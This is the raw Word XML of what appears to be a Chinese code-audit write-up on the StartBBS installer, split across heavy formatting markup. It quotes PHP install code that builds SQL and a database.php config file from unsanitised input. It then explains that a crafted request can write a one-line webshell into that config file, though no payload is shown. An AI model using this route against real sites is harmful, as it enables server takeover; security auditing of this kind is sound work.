            <v:line id="_x0000_s3531" style="position:absolute" from="8364,11405" to="8364,11731" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s3530" style="position:absolute;left:1617;top:11731;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3529" style="position:absolute;left:1797;top:11794;width:1084;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3528" style="position:absolute;left:2881;top:11794;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3527" style="position:absolute;left:3002;top:11794;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3526" style="position:absolute;left:3725;top:11794;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s3525" style="position:absolute" from="1614,11731" to="1614,12057" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s3524" style="position:absolute" from="8364,11731" to="8364,12057" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s3523" style="position:absolute;left:1617;top:12057;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3522" style="position:absolute;left:1797;top:12120;width:6411;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s3521" style="position:absolute" from="1614,12057" to="1614,12383" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s3520" style="position:absolute" from="8364,12057" to="8364,12383" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s3519" style="position:absolute;left:1617;top:12383;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3518" style="position:absolute;left:1797;top:12446;width:3374;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s3517" style="position:absolute" from="1612,12891" to="8366,12891" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s3516" style="position:absolute" from="1614,12383" to="1614,12894" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s3515" style="position:absolute" from="8364,12383" to="8364,12894" strokecolor="#ccc" strokeweight=".24pt"/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>(group_type</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>,gid,is</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>_active,username,password,email,re gtime,ip) VALUES ('0','1','1','"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>.$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>userid."','".$p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>assword."','".$email.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417" w:right="2322"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>"','".</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>time(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>)."','".$ip."')";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="280" w:left="1380" w:header="720" w:footer="720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3513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mysql_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>query(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$insert);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mysql_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>close(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$conn);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61"/>
                    <w:ind w:left="1095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'msg2']="</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>安装完成，正在保存配置文件，请稍</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="50"/>
                    <w:ind w:left="180" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>后</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>……</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>";</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="1102"/>
                    </w:tabs>
                    <w:spacing w:before="112" w:line="391" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="461" w:firstLine="4579"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$dbconfig = "&lt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>?php</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t xml:space="preserve">if ( ! </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>defined(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'BASEPATH'))</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-11"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>exit('No</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr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color w:val="333333"/>
                    </w:rPr>
                    <w:t>direct</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="99"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>script access</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr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color w:val="333333"/>
                    </w:rPr>
                    <w:t>allowed');\n"</w:t>
                  </w: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."</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>\$active_group = 'default'</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>;\</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>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."\$active_record = TRUE</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>;\</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>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'default']['hostname']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'"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dbhost."';\</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>n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'default']['port'] = '".$dbport."';\</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>n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'default']['username']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'"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dbuser."';\</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>n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'default']['password']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'"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dbpw</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>d."';\</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>n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'default']['database']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'"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dbname."';\</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>n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'default']['dbdriver'] = 'mysql';\n"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'default']['dbprefix']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'"</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>.$</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>dbprefix."';\</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>n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3512" type="#_x0000_t202" style="width:339.5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'default']['pconnect'] = TRUE;\n"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'default']['db_debug'] = TRUE;\n"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'default']['cache_on'] = FALSE;\n"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88" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="1941" w:firstLine="914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'default']['cachedir'] = 'app/cache';\n"</w:t>
                  </w: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</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>]['char_set'] = 'utf8';\n"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941" w:firstLine="914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'default']['dbcollat'] = 'utf8_general_ci';\n"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'default']['swap_pre'] = '';\n"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'default']['autoinit'] = TRUE;\n"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r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>."\$</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>db[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'default']['stricton'] = FALSE;";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124"/>
                    <w:ind w:right="1181"/>
                    <w:jc w:val="right"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$file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72"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>FCPATH.'</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>/app/config/database.php';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r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>file_put_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>contents(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$file,$dbconfig);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59"/>
                    <w:ind w:right="360"/>
                    <w:jc w:val="right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//</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>保存</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-51"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>config</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-74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文</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="50"/>
                    <w:ind w:left="18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color w:val="333333"/>
                      <w:w w:val="99"/>
                    </w:rPr>
                    <w:t>件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$sub_folder){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72"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;config-&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>update(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'myconfig','sub_folder',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72"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$sub_folder);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124"/>
                    <w:ind w:right="1903"/>
                    <w:jc w:val="right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3511" type="#_x0000_t202" style="width:337.5pt;height:360.5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 xml:space="preserve">$encryption_key = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>md5(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>uniqid());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$encryption_key){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213" w:firstLine="914"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;config-&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>update(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'myconfig','encryption_ key', $encryption_key);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:right="1863"/>
                    <w:jc w:val="right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59" w:line="621" w:lineRule="auto"/>
                    <w:ind w:left="1095" w:right="1786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'msg3']="</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>保存配置文件完成！</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>"; touch(FCPATH.'install.lock');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="71"/>
                    <w:ind w:left="1095" w:right="50"/>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                    </w:rPr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</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>msg4']="</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>创建锁定安装文件</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-55"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>install.lock</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-78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成功</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112"/>
                    <w:ind w:left="180" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>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80020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="161"/>
                    <w:ind w:left="1095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data[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'msg5']="</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>安装</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-54"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>startbbs</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-77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成功！</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112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>$this-&gt;load-&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>view(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'install',$data);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5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="37" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="344"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-66"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">step </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-66"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，就执行安装函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
        </w:rPr>
        <w:t>_install_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
        </w:rPr>
        <w:t>do(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个函数里</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化了数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并把数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置文件写入了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>“/app/config/database.php”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>。于是，我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>可以构造一下数据包直接把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一句</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>话</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个配置文件里。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1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看到，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个函数接收了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>许</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>多</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-79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post </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数据：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
